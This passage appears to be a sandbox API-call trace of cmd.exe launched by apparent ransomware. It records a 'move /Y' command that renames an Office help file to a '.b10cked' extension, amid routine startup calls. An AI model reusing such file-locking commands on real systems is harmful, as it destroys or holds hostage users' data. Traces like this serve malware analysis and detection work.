0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 30273 start_va = 0x12f0000 end_va = 0x13affff entry_point = 0x12f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 662 os_tid = 0xcb4 [0204.422] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf874 | out: lpSystemTimeAsFileTime=0x2cf874*(dwLowDateTime=0xaea802a0, dwHighDateTime=0x1d440a9)) [0204.422] GetCurrentProcessId () returned 0xc2c [0204.422] GetCurrentThreadId () returned 0xcb4 [0204.422] GetTickCount () returned 0x399de [0204.422] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf86c | out: lpPerformanceCount=0x2cf86c*=26121121663) returned 1 [0204.423] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.423] __set_app_type (_Type=0x1) [0204.423] __p__fmode () returned 0x76b331f4 [0204.423] __p__commode () returned 0x76b331fc [0204.423] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.423] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.423] GetCurrentThreadId () returned 0xcb4 [0204.423] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb4) returned 0x38 [0204.423] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.423] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.423] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.423] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.423] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf804 | out: 
phkResult=0x2cf804*=0x0) returned 0x2 [0204.423] VirtualQuery (in: lpAddress=0x2cf83b, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.423] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.424] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.424] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.424] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.424] GetConsoleOutputCP () returned 0x1b5 [0204.424] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.424] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.424] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.424] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.424] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.424] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.424] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.424] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.424] _get_osfhandle (_FileHandle=0) returned 
0x3 [0204.424] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.425] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.425] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.425] GetEnvironmentStringsW () returned 0x490180* [0204.425] FreeEnvironmentStringsW (penv=0x490180) returned 1 [0204.425] GetEnvironmentStringsW () returned 0x490180* [0204.425] FreeEnvironmentStringsW (penv=0x490180) returned 1 [0204.425] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce774 | out: phkResult=0x2ce774*=0x40) returned 0x0 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0xa8, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x1, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x1, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x0, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x40, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce77c, 
lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x40, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x40, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.426] RegCloseKey (hKey=0x40) returned 0x0 [0204.426] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce774 | out: phkResult=0x2ce774*=0x40) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x40, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x1, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x1, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x0, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x9, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, 
lpData=0x2ce780*=0x9, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x9, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.426] RegCloseKey (hKey=0x40) returned 0x0 [0204.426] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.426] srand (_Seed=0x5b8863a6) [0204.426] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"" [0204.426] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"" [0204.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.426] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4918e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.427] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.427] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.427] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.427] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.427] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.427] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.427] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") 
returned 13 [0204.427] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.427] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.427] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.427] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.427] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.427] GetEnvironmentStringsW () returned 0x4922d0* [0204.427] FreeEnvironmentStringsW (penv=0x4922d0) returned 1 [0204.427] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.427] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.427] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.427] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.427] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.427] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.427] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.427] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.427] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.427] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.427] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf540 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.428] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf540, lpFilePart=0x2cf53c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf53c*="Desktop") returned 0x18 [0204.428] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.428] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf2bc | out: lpFindFileData=0x2cf2bc) returned 0x490010 [0204.428] FindClose 
(in: hFindFile=0x490010 | out: hFindFile=0x490010) returned 1 [0204.428] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf2bc | out: lpFindFileData=0x2cf2bc) returned 0x490010 [0204.428] FindClose (in: hFindFile=0x490010 | out: hFindFile=0x490010) returned 1 [0204.428] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf2bc | out: lpFindFileData=0x2cf2bc) returned 0x490010 [0204.428] FindClose (in: hFindFile=0x490010 | out: hFindFile=0x490010) returned 1 [0204.428] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.428] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.428] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.428] GetEnvironmentStringsW () returned 0x492af0* [0204.429] FreeEnvironmentStringsW (penv=0x492af0) returned 1 [0204.429] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.429] GetConsoleOutputCP () returned 0x1b5 [0204.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.429] GetUserDefaultLCID () returned 0x409 [0204.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf680, cchData=128 | out: lpLCData="0") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf680, cchData=128 | out: lpLCData="0") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf680, cchData=128 | out: lpLCData="1") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, 
lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.430] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.431] GetConsoleTitleW (in: lpConsoleTitle=0x4808e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.431] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.431] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0204.431] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.431] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.432] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.432] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.432] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.432] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.432] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0204.432] 
_wcsicmp (_String1="REM", _String2="move") returned 5 [0204.432] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.434] GetConsoleTitleW (in: lpConsoleTitle=0x2cf378, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.435] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.435] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.435] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.435] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.435] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.435] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.435] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.435] _wcsicmp (_String1="move", _String2="SET") returned -6 [0204.435] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.435] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.435] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.435] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.435] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.435] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.435] _wcsicmp (_String1="move", _String2="RD") returned -5 [0204.435] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.435] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.435] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.435] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.435] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.435] _wcsicmp (_String1="move", _String2="VER") returned -9 
[0204.435] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.435] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.435] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.435] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.436] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.436] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.436] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.436] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.436] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.437] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.437] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.437] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf134, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf12c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf12c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.438] _wcsnicmp (_String1="COPYCMD", 
_String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="windir=", 
_MaxCount=0x7) returned -20 [0204.438] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.439] _wcsicmp (_String1="MSMSOU~1.HXN", _String2=".") returned 63 [0204.439] _wcsicmp (_String1="MSMSOU~1.HXN", _String2="..") returned 63 [0204.439] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsou~1.hxn")) returned 0x2022 [0204.439] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x491e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.439] SetErrorMode (uMode=0x0) returned 0x0 [0204.439] SetErrorMode (uMode=0x1) returned 0x0 [0204.439] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", nBufferLength=0x104, lpBuffer=0x2ceabc, lpFilePart=0x2ceaa4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", lpFilePart=0x2ceaa4*="MSMSOU~1.HXN") returned 0x27 [0204.439] SetErrorMode (uMode=0x0) returned 0x1 [0204.439] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.439] _wcsicmp (_String1="MSMSOU~1.HXN", _String2=".") returned 63 [0204.439] _wcsicmp (_String1="MSMSOU~1.HXN", _String2="..") returned 63 [0204.439] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsou~1.hxn")) returned 0x2022 [0204.439] SetErrorMode (uMode=0x0) returned 0x0 [0204.439] SetErrorMode (uMode=0x1) returned 0x0 [0204.439] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", nBufferLength=0x104, lpBuffer=0x2cef38, lpFilePart=0x2cecd0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", lpFilePart=0x2cecd0*="MSMSOU~1.HXN") returned 0x27 [0204.440] SetErrorMode (uMode=0x0) returned 0x1 [0204.440] SetErrorMode (uMode=0x0) returned 0x0 [0204.440] SetErrorMode (uMode=0x1) returned 0x0 [0204.440] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x2cf140, lpFilePart=0x2cecd0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked", lpFilePart=0x2cecd0*="MS.MSOUC.14.1033.hxn.b10cked") returned 0x37 [0204.440] SetErrorMode (uMode=0x0) returned 0x1 [0204.440] SetLastError (dwErrCode=0x0) [0204.440] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.msouc.14.1033.hxn.b10cked")) returned 0xffffffff [0204.440] GetLastError () returned 0x2 [0204.440] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2ce64c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce64c) returned 0x480e68 [0204.440] FindNextFileW (in: hFindFile=0x480e68, lpFindFileData=0x2ce64c | out: lpFindFileData=0x2ce64c) returned 0 [0204.441] FindClose (in: hFindFile=0x480e68 | out: hFindFile=0x480e68) returned 1 [0204.441] GetLastError () returned 0x12 [0204.441] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2ce64c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce64c) returned 0x480e68 [0204.441] FindNextFileW (in: hFindFile=0x480e68, lpFindFileData=0x2ce64c | out: 